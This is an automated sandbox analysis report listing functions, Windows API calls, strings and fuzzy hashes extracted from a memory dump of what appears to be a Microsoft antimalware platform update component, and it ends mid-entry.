Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: ProcessTimes
String ID:
API String ID: 1995159646-0
Opcode ID: 776e6b40a54369ffcf7ea6847ce2f4158608658f7245ce6b1a5fce1194d5166b
Instruction ID: f726554c7875070ac805568d41101e1b2888816be9b9f5789ccc705fadd8a02d
Opcode Fuzzy Hash: 776e6b40a54369ffcf7ea6847ce2f4158608658f7245ce6b1a5fce1194d5166b
Instruction Fuzzy Hash: C4E0EEB6B15F4499CB009F60E44989D33E8FB18390BA20276C7AC03310EF3ACA69C790

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FF7B57CB0C8, Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 396serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32 ref: 00007FF7B57CB162
OpenServiceW.ADVAPI32 ref: 00007FF7B57CB303
CloseServiceHandle.ADVAPI32 ref: 00007FF7B57CB4B6

Part of subcall function 00007FF7B57C570C: TraceMessage.ADVAPI32 ref: 00007FF7B57C571F

CloseServiceHandle.ADVAPI32 ref: 00007FF7B57CB4C4
StartServiceW.ADVAPI32 ref: 00007FF7B57CB4DA
CloseServiceHandle.ADVAPI32 ref: 00007FF7B57CB708

Part of subcall function 00007FF7B582DF80: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF7B582830E), ref: 00007FF7B582DF84

CloseServiceHandle.ADVAPI32 ref: 00007FF7B57CB716

Strings

ServiceStart, xrefs: 00007FF7B57CB14A
The %ws service was started, xrefs: 00007FF7B57CB6F4
UtilStartService %ws with %lu ms timeout, xrefs: 00007FF7B57CB6E0
OpenServiceW(%ws), xrefs: 00007FF7B57CB49B
1.1.18500.10, xrefs: 00007FF7B57CB182, 00007FF7B57CB3D6, 00007FF7B57CB610
OpenSCManagerW, xrefs: 00007FF7B57CB2DC

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: Service$CloseHandle$Open$ErrorLastManagerMessageStartTrace
String ID: 1.1.18500.10$OpenSCManagerW$OpenServiceW(%ws)$ServiceStart$The %ws service was started$UtilStartService %ws with %lu ms timeout
API String ID: 1997304263-408757754
Opcode ID: 2c238b2053f66573e2a51145c593d83d223e0a30b16751cfbb3ecff9b4c2d305
Instruction ID: 5c12f65f1543f8d0ecd809f96147238ed74e3da09895a18e43f68dfb3f4d25ab
Opcode Fuzzy Hash: 2c238b2053f66573e2a51145c593d83d223e0a30b16751cfbb3ecff9b4c2d305
Instruction Fuzzy Hash: C2127D32B09B4285EB11AB19E4402A9B3A4FB6AF54FC04136EB4D0776EDF3CE495C760

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B57CB944, Relevance: 23.1, APIs: 6, Strings: 7, Instructions: 338timeregistryCOMMON

Download Yara Rule

APIs

CreateWaitableTimerW.KERNEL32 ref: 00007FF7B57CB98F
CreateWaitableTimerW.KERNEL32 ref: 00007FF7B57CBA31
CloseHandle.KERNEL32 ref: 00007FF7B57CBE0E

Part of subcall function 00007FF7B582DF80: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF7B582830E), ref: 00007FF7B582DF84

RegCloseKey.ADVAPI32 ref: 00007FF7B57CBDD4
CloseHandle.KERNEL32 ref: 00007FF7B57CBDF2
CloseHandle.KERNEL32 ref: 00007FF7B57CBE00

Part of subcall function 00007FF7B57C572C: TraceMessage.ADVAPI32 ref: 00007FF7B57C5755

Strings

SignatureLocation, xrefs: 00007FF7B57CBC65, 00007FF7B57CBC7F
%ws\%ws, xrefs: 00007FF7B57CBB2E
UtilRegOpenKey(%ws), xrefs: 00007FF7B57CBBB2
Signature Updates, xrefs: 00007FF7B57CBB27
WaitForSignatureUpdate, xrefs: 00007FF7B57CB976
UtilRegGetValueString(%ws), xrefs: 00007FF7B57CBC86
NISSignatureLocation, xrefs: 00007FF7B57CBD20, 00007FF7B57CBD3E

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: Close$Handle$CreateTimerWaitable$ErrorLastMessageTrace
String ID: %ws\%ws$NISSignatureLocation$Signature Updates$SignatureLocation$UtilRegGetValueString(%ws)$UtilRegOpenKey(%ws)$WaitForSignatureUpdate
API String ID: 3048240453-2612545560
Opcode ID: 786df362da66710e472efabf4a14741833c43c16e244f012e55eb6896c52fa27
Instruction ID: 3ae56fc88178fcb4944ef9c89c02ed73834984d7de946c084aec8e929c9ded5f
Opcode Fuzzy Hash: 786df362da66710e472efabf4a14741833c43c16e244f012e55eb6896c52fa27
Instruction Fuzzy Hash: 59E18221B0861381FB15B76D94502B9A3A0AF6AF98FD44035DF0D976AFDF3DE4868360

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B57DDFB4, Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214timeCOMMON

Download Yara Rule

APIs

CreateWaitableTimerW.KERNEL32(?,?,?,?,?,?,?,?,?,?,1.1.18500.10,00000000,?,00007FF7B57CB531), ref: 00007FF7B57DDFE9
CreateWaitableTimerW.KERNEL32(?,?,?,?,?,?,?,?,?,?,1.1.18500.10,00000000,?,00007FF7B57CB531), ref: 00007FF7B57DE09D
QueryServiceStatus.ADVAPI32 ref: 00007FF7B57DE190
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,1.1.18500.10,00000000,?,00007FF7B57CB531), ref: 00007FF7B57DE08E

Part of subcall function 00007FF7B582DF80: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF7B582830E), ref: 00007FF7B582DF84

CloseHandle.KERNEL32 ref: 00007FF7B57DE1B9
CloseHandle.KERNEL32 ref: 00007FF7B57DE1C7

Part of subcall function 00007FF7B57C572C: TraceMessage.ADVAPI32 ref: 00007FF7B57C5755

CloseHandle.KERNEL32 ref: 00007FF7B57DE292
CloseHandle.KERNEL32 ref: 00007FF7B57DE2A0

Strings

1.1.18500.10, xrefs: 00007FF7B57DDFC6

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseHandle$CreateTimerWaitable$ErrorLastMessageQueryServiceStatusTrace
String ID: 1.1.18500.10
API String ID: 714155307-3903888121
Opcode ID: bb14469bf03d642ffed71ded074a2714811ae35b59b7317cadebb365769c4dac
Instruction ID: 107e618ba91d88c23d2023d3e3c657992670445c3a45b44114a0cf9c582bc5e5
Opcode Fuzzy Hash: bb14469bf03d642ffed71ded074a2714811ae35b59b7317cadebb365769c4dac
Instruction Fuzzy Hash: 4C91A071F08A0381FB56AB2D99406B9B3919F6EF84F944131CF1D466AEDF3DE4828760

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B57E1AE0, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 131COMMON

Download Yara Rule

APIs

FindResourceW.KERNEL32 ref: 00007FF7B57E1B9F
GetLastError.KERNEL32 ref: 00007FF7B57E1BAD
LoadResource.KERNEL32 ref: 00007FF7B57E1BC5
GetLastError.KERNEL32 ref: 00007FF7B57E1BD3
LockResource.KERNEL32 ref: 00007FF7B57E1BE4
GetLastError.KERNEL32 ref: 00007FF7B57E1BF2
SizeofResource.KERNEL32 ref: 00007FF7B57E1C0B
GetLastError.KERNEL32 ref: 00007FF7B57E1C17

Strings

CABINET, xrefs: 00007FF7B57E1B8E
UPDATEPAYLOAD, xrefs: 00007FF7B57E1B95
UPDATEPAYLOAD, xrefs: 00007FF7B57E1B00

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastResource$FindLoadLockSizeof
String ID: CABINET$UPDATEPAYLOAD$UPDATEPAYLOAD
API String ID: 2627587518-990907170
Opcode ID: f2e668de34c3054247195744fa99f33268eacafaa0992ac2f913bdfb522dd841
Instruction ID: 991c0bb05d96dbb4e223af4bdcc3cadc708760191b74fd9602cf172e4ee56210
Opcode Fuzzy Hash: f2e668de34c3054247195744fa99f33268eacafaa0992ac2f913bdfb522dd841
Instruction Fuzzy Hash: 88419221B1974241FB107B79A411279A295AF7AFE4F944231CB5E877EEEE3CE4108361

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B582F884, Relevance: 18.2, APIs: 12, Instructions: 245COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7B582E0C4: AllocateAndInitializeSid.ADVAPI32(00000000,00000000,?,00007FF7B582E348), ref: 00007FF7B582E140

SetLastError.KERNEL32 ref: 00007FF7B582FBF9

Part of subcall function 00007FF7B582E0C4: FreeSid.ADVAPI32 ref: 00007FF7B582E198

GetCurrentProcess.KERNEL32 ref: 00007FF7B582F967

Part of subcall function 00007FF7B58280FC: OpenProcessToken.ADVAPI32 ref: 00007FF7B582811B

Part of subcall function 00007FF7B582E1D8: GetTokenInformation.ADVAPI32(?,?,00000001,?,00000000,?,00000000,00007FF7B582F99D), ref: 00007FF7B582E255

GetLengthSid.ADVAPI32 ref: 00007FF7B582F9FD
InitializeSecurityDescriptor.ADVAPI32 ref: 00007FF7B582FA58
InitializeAcl.ADVAPI32 ref: 00007FF7B582FA72
AddAccessAllowedAce.ADVAPI32 ref: 00007FF7B582FA95
AddAccessAllowedAce.ADVAPI32 ref: 00007FF7B582FAAE
AddAccessAllowedAce.ADVAPI32 ref: 00007FF7B582FAC8
AddAccessAllowedAce.ADVAPI32 ref: 00007FF7B582FAE2
SetSecurityDescriptorDacl.ADVAPI32 ref: 00007FF7B582FAFD
GetLastError.KERNEL32 ref: 00007FF7B582FB07
CloseHandle.KERNEL32 ref: 00007FF7B582FB57

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: AccessAllowed$Initialize$DescriptorErrorLastProcessSecurityToken$AllocateCloseCurrentDaclFreeHandleInformationLengthOpen
String ID:
API String ID: 1201167613-0
Opcode ID: c5a52584c41f944f2501b333050645f8abc0354640551a9a94ebedea0f1020a4
Instruction ID: a6b041190e476d2ea7a906b42d217347f7517dc842bd3dfc2958a6d0deb33580
Opcode Fuzzy Hash: c5a52584c41f944f2501b333050645f8abc0354640551a9a94ebedea0f1020a4
Instruction Fuzzy Hash: 0DA18021B0864286F710AB75E8106AEA7A5BF66F88F804135DF0D97B9EDF3DE425C710

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B57E9278, Relevance: 17.9, APIs: 1, Strings: 9, Instructions: 367COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7B582AB60: GetProcAddress.KERNEL32 ref: 00007FF7B582AB79

FreeLibrary.KERNEL32 ref: 00007FF7B57E9668

Part of subcall function 00007FF7B57E9E4C: RegCloseKey.ADVAPI32 ref: 00007FF7B57E9E9A

Strings

AntiMalware SFC Instrumentation, xrefs: 00007FF7B57E95D1
wer.dll, xrefs: 00007FF7B57E92B3
WerReportSetParameter, xrefs: 00007FF7B57E9311
WerReportSubmit, xrefs: 00007FF7B57E934F
unspecified, xrefs: 00007FF7B57E93C4
WerReportCloseHandle, xrefs: 00007FF7B57E92F2
WerReportCreate, xrefs: 00007FF7B57E92CF
WerReportAddFile, xrefs: 00007FF7B57E9330
ForceQueue, xrefs: 00007FF7B57E94C8, 00007FF7B57E954F, 00007FF7B57E9583

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressCloseFreeLibraryProc
String ID: AntiMalware SFC Instrumentation$ForceQueue$WerReportAddFile$WerReportCloseHandle$WerReportCreate$WerReportSetParameter$WerReportSubmit$unspecified$wer.dll
API String ID: 1209211329-4093131488
Opcode ID: 3cee3765bfd6f67a6e9c5d396466c6584c3183aed5faeb8c6ec84061e6beed48
Instruction ID: 13c8a81b7d4091af1ceb5f286d2bd7227eac6cce6f9b30b3643d1dd92beaaeeb
Opcode Fuzzy Hash: 3cee3765bfd6f67a6e9c5d396466c6584c3183aed5faeb8c6ec84061e6beed48
Instruction Fuzzy Hash: 21F19422B0874585F710BB2ED4102B9B395AF6AF84F900531DF1D57AAEDF39E456C720

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B57DF810, Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 228fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7B57D9FF0: NtSetInformationFile.NTDLL ref: 00007FF7B57DA03D

FindFirstFileW.KERNEL32 ref: 00007FF7B57DF8E9
FindNextFileW.KERNEL32 ref: 00007FF7B57DFAB9
FindClose.KERNEL32 ref: 00007FF7B57DFAE8
CloseHandle.KERNEL32 ref: 00007FF7B57DFB35
CloseHandle.KERNEL32 ref: 00007FF7B57DFB45

Strings

%ws\*, xrefs: 00007FF7B57DF8AD
N/A, xrefs: 00007FF7B57DF846
1.1.18500.10, xrefs: 00007FF7B57DFA00

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseFileFind$Handle$FirstInformationNext
String ID: %ws\*$1.1.18500.10$N/A
API String ID: 2397931032-738686011
Opcode ID: 1b32b01f14943e03f5d85c82d9b9356ba50f84a3b1adf05b00bff58567a42318
Instruction ID: bbcfbbecf5199d6fe9ba53d99165c76d7eb72cb678fedfd1c8c23aae75bb65d9
Opcode Fuzzy Hash: 1b32b01f14943e03f5d85c82d9b9356ba50f84a3b1adf05b00bff58567a42318
Instruction Fuzzy Hash: 48B17422B08B8285EB10EB29D4402A9B3A4FB5AF54F840231DB5D477EEDF3CE455C790

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B582F118, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32 ref: 00007FF7B582F14D
GetCurrentProcess.KERNEL32 ref: 00007FF7B582F171
CloseHandle.KERNEL32 ref: 00007FF7B582F19A

Strings

SeDebugPrivilege, xrefs: 00007FF7B582F13F

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCurrentHandleLookupPrivilegeProcessValue
String ID: SeDebugPrivilege
API String ID: 2086975097-2896544425
Opcode ID: 58e642ff7d344ad835fb592377e479469470b21d1f5ed701b3762176509fc27c
Instruction ID: ea5dfc5adce22965c4845603a2c4d404b5a2d7523bc4d158b2a432b2d9ac5cd9
Opcode Fuzzy Hash: 58e642ff7d344ad835fb592377e479469470b21d1f5ed701b3762176509fc27c
Instruction Fuzzy Hash: 0731C761A1C68281FB41AB29E44137AA6A0EFA6F44FD44135EB0F4655EDF3DD064CB20

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B57DF3E8, Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 257pipeCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 00007FF7B57DF426

Part of subcall function 00007FF7B57DB158: FindCloseChangeNotification.KERNELBASE(?,?,00000000), ref: 00007FF7B57DB1A5

GetCurrentProcessId.KERNEL32 ref: 00007FF7B57DF4B9
CreateNamedPipeW.KERNEL32 ref: 00007FF7B57DF59A
GetCurrentProcessId.KERNEL32 ref: 00007FF7B57DF5D8

Strings

%ws\%ws-%ws, xrefs: 00007FF7B57DF4EC
\\.\pipe, xrefs: 00007FF7B57DF4E5

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentProcess$ChangeCloseCreateFindNamedNotificationPipe
String ID: %ws\%ws-%ws$\\.\pipe
API String ID: 338252301-4015700902
Opcode ID: e44a943317834c4a535a44e0dfa80d958860849ee63927837480f025b95c0a8f
Instruction ID: 8a7fbe094c7aaf303ca198b9925a887e8024495cb692bd29b966ec7715049d20
Opcode Fuzzy Hash: e44a943317834c4a535a44e0dfa80d958860849ee63927837480f025b95c0a8f
Instruction Fuzzy Hash: E8B18362B0868286E650BB19E4402BAE7A0EFAAF54FC00131DB5D43AEFDF3DE555C750

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B582C1C4, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 186fileCOMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32 ref: 00007FF7B582C37D
DecryptFileW.ADVAPI32 ref: 00007FF7B582C3C2
FreeLibrary.KERNEL32 ref: 00007FF7B582C3DC
FreeLibrary.KERNEL32 ref: 00007FF7B582C3F9
CreateDirectoryW.KERNEL32 ref: 00007FF7B582C295

Part of subcall function 00007FF7B57C572C: TraceMessage.ADVAPI32 ref: 00007FF7B57C5755

Strings

feclient.dll, xrefs: 00007FF7B582C32D

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeLibrary$CreateDecryptDirectoryFileMessageTrace
String ID: feclient.dll
API String ID: 1418445732-3074931424
Opcode ID: 0c788426b131caa49acfa325876c9645cb7c78551ac99736c101c954a3d58b30
Instruction ID: 7576d863d06f334d771d4c292a5a6b817c120248c3a13564c74604d564633270
Opcode Fuzzy Hash: 0c788426b131caa49acfa325876c9645cb7c78551ac99736c101c954a3d58b30
Instruction Fuzzy Hash: D8815121B08642A1FB00BBADD4502B9AB919F66F88F940431CF1D976AFCF7EE4558760

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B584BD68, Relevance: 10.6, APIs: 7, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF7B584BD84
RtlCaptureContext.NTDLL ref: 00007FF7B584BDB1
RtlLookupFunctionEntry.NTDLL ref: 00007FF7B584BDCB
RtlVirtualUnwind.NTDLL ref: 00007FF7B584BE0C
IsDebuggerPresent.KERNEL32 ref: 00007FF7B584BE60
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF7B584BE81
UnhandledExceptionFilter.KERNEL32 ref: 00007FF7B584BE8C

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 2c7c3a9c2580f9e2e71833a6fd49e91efc30d844b9996d0cdc1381d13c0380e1
Instruction ID: d693d698f0f8d43c42df8541252aaeefe092eafb2d8d3ca5eaffa2302016aa13
Opcode Fuzzy Hash: 2c7c3a9c2580f9e2e71833a6fd49e91efc30d844b9996d0cdc1381d13c0380e1
Instruction Fuzzy Hash: A1317072605B8189EB609F64E8403ED7360FBA5B45F844039DB4E4369EDF3CC558C710

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B5833BFC, Relevance: 9.1, APIs: 6, Instructions: 83COMMON

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 00007FF7B5833C75
RtlLookupFunctionEntry.NTDLL ref: 00007FF7B5833C8D
RtlVirtualUnwind.NTDLL ref: 00007FF7B5833CC8
IsDebuggerPresent.KERNEL32 ref: 00007FF7B5833D01
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF7B5833D0B
UnhandledExceptionFilter.KERNEL32 ref: 00007FF7B5833D16

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 184dc2d647a5c563c04035c8fdb1addf45216d656a064467e3288f34b8d9224c
Instruction ID: 6743dafff0841c87122a1414b3ef5d324992e54b9ddd9cac911647f87aae2826
Opcode Fuzzy Hash: 184dc2d647a5c563c04035c8fdb1addf45216d656a064467e3288f34b8d9224c
Instruction Fuzzy Hash: 66317436618B8186EB60DF29E8402AEB3A0FB95B55F900136EB8D43B6DDF3CC555CB10

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B584837C, Relevance: 7.8, APIs: 5, Instructions: 286COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e449e190713353ef98639f36a3419b0bb8e0cc4fa66b99e9ac341a65f340e49b
Instruction ID: 31f135cc01b6645e915e00806857b564bdd83d86e2d3ed63887b0fbe79b13c67
Opcode Fuzzy Hash: e449e190713353ef98639f36a3419b0bb8e0cc4fa66b99e9ac341a65f340e49b
Instruction Fuzzy Hash: FDC1B562A0868659E7A07B19A4543BEA750FB62F94FC50131EF4E0769FCF7CE4748B20

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B5852504, Relevance: 6.3, APIs: 4, Instructions: 282COMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32 ref: 00007FF7B585265A

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 5b973ca3191a4dce1ab5da5945e3816996496b90d46b7e62a10b196a0c35d8bb
Instruction ID: 4661320cf6d4731c438c56b907762ccc2ce748c8d88628ceafb213583cc80fb0
Opcode Fuzzy Hash: 5b973ca3191a4dce1ab5da5945e3816996496b90d46b7e62a10b196a0c35d8bb
Instruction Fuzzy Hash: ACB1C921B1869241EA65EB69A4111B9E391FB66FE4F844131EF4E0BBCEDF3CE461C710

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B57E5B80, Relevance: 6.2, APIs: 4, Instructions: 174fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32 ref: 00007FF7B57E5B9D
FlushFileBuffers.KERNEL32 ref: 00007FF7B57E5C21

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: File$BuffersFlushRead
String ID:
API String ID: 2772131020-0
Opcode ID: 7f0d1bcdbc819d49b2cbb6e67232aeeb33454689757bd5151a099aa21c6086ca
Instruction ID: 77b1c95c7e86a9bf23df5f1d2e6bf926b2dbb1cdd2537aa4c60e41f3532ce5b1
Opcode Fuzzy Hash: 7f0d1bcdbc819d49b2cbb6e67232aeeb33454689757bd5151a099aa21c6086ca
Instruction Fuzzy Hash: 7251F921B0C74A82EB10AB29E44427DA760EFA9F84F900131DB1D47BAFCF7DD4928750

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7B582D874, Relevance: 6.1, APIs: 4, Instructions: 55COMMON

Download Yara Rule

APIs

RtlGetVersion.NTDLL ref: 00007FF7B582D904
RtlNtStatusToDosError.NTDLL ref: 00007FF7B582D910
SetLastError.KERNEL32 ref: 00007FF7B582D918
GetLastError.KERNEL32 ref: 00007FF7B582D91E

Memory Dump Source

Source File: 0000002D.00000002.19666302185.00007FF7B57C1000.00000020.00020000.sdmp, Offset: 00007FF7B57C0000, based on PE: true

Associated: 0000002D.00000002.19666219595.00007FF7B57C0000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19667784619.00007FF7B5857000.00000002.00020000.sdmp Download File
Associated: 0000002D.00000002.19668170987.00007FF7B5879000.00000004.00020000.sdmp Download File
Associated: 0000002D.00000002.19668279163.00007FF7B587C000.00000002.00020000.sdmp Download File

Similarity

API ID: Error$Last$StatusVersion
String ID:
API String ID: 3539761734-0
Opcode ID: 3943596eefd01f18dea060fa2ce76c56411fdc92286132ae22e1316f297c0fae
Instruction ID: cc742057e9020c161c29baf429b594fc854f6b2d9cf910b49c189f339e10182f
